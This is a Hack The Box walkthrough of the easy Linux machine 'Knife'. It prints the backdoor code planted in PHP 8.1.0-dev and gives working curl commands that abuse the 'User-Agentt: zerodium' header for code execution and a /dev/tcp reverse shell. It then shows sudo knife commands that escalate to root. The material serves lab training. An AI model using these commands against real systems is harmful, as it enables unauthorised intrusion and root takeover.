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23th April 2021 / Document No D21.100.128

Prepared By: MrR3boot

Machine Creator(s): MrKN16H7

Difficulty: Easy

Classification: Official
Knife is an easy difficulty Linux machine that features an application which is running on a backdoored
version of PHP. This vulnerability is leveraged to obtain the foothold on the server. A sudo misconfiguration
is then exploited to gain a root shell.

Skills Required
Basic Knowledge of Linux
OWASP Top 10

Skills Learned
Web Exploitation
Knife Sudo Exploitation
ports=$(nmap -p- --min-rate=1000 -T4 | grep ^[0-9] | cut -d '/' -f 1 | tr
'\n' ',' | sed s/,$//)
nmap -p$ports -sV -sC

Nmap scan reveals that the target server has two ports open.

Let's browse to port 80.

Apache is hosting an Emergent Medical Idea application. There's nothing interesting in this application.

Let's enumerate files and folders using ffuf utility.
Nothing interesting from the results. We send a cURL request to index.php page and observe the
response headers.

X-Powered-By header reveals that the application is using PHP/8.1.0-dev version. Searching
vulnerabilities related to this version reveals that it has a known RCE exploit.
PHP version 8.1.0-dev was released with a backdoor on March 28th, 2021 where two malicious commits
were pushed to the php-src-repo , but the backdoor was quickly discovered and removed. Exploit has a
reference to a git commit which explains the backdoor functionality.

zval zoh;
php_output_handler *h;
zval *enc;

if ((Z_TYPE(PG(http_globals)[TRACK_VARS_SERVER]) == IS_ARRAY ||
zend_is_auto_global_str(ZEND_STRL("_SERVER"))) &&
(enc = zend_hash_str_find(Z_ARRVAL(PG(http_globals)[TRACK_VARS_SERVER]),
if (strstr(Z_STRVAL_P(enc), "zerodium")) {
zend_try {
zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid
} zend_end_try();

switch (ZLIBG(output_compression)) {
case 0:

The code checks for the first occurance of zerodium string in User-Agentt request header. If found, it
then executes the code after that string.

zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");

Let's setup a listener on port 80 and verify this by sending a cURL request to our server.

curl -H 'User-Agentt: zerodiumsystem("curl");'
After successfully receive the request we fire up a listener on port 1234 and send below request to obtain
the reverse shell.

curl -H "User-Agentt: zerodiumsystem(\"bash -c 'bash -i

&>/dev/tcp/ 0>&1 '\");"

This is indeed successful and a shell as james is received.

Privilege Escalation
Having foothold on the server, it is possible to enumerate the different ways to escalate privileges. We
enumerate the server using scripts such as or We download the script and copy it to
the apache web root path. Next, we use curl to transfer and execute the script.


Output shows that james is allowed to run knife as root. Knife tool provides an interface to manage Chef
automation server nodes, cookbooks, recipes and etc. Knife usage can be read from manpage. Some
examples shows that, it is possible to edit knife data bags using a text editor. We can try that.

sudo knife data bag create 1 2 -e vi

This opens up the vim editor. We type below in the editor to get a shell as root.


This can also be achieved using knife exec sub-command. We can upgrade the shell to a fully interactive.
python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo

Now it is possible to execute keyboard shortcuts in the shell session. Knife also provides an option exec to
execute ruby scripts. We issue the following command.

sudo knife exec

This opens up an interactive shell to execute the code. We type the code below and press CTRL D to run it.

exec "/bin/bash"

This is successful and a shell as root is obtained. Alternatively the following ways can also be used to obtain
a root shell.

sudo knife exec --exec "exec '/bin/sh -i'"

echo -n 'exec "/bin/bash -i"' > config.rb
sudo knife user list -c config.rb

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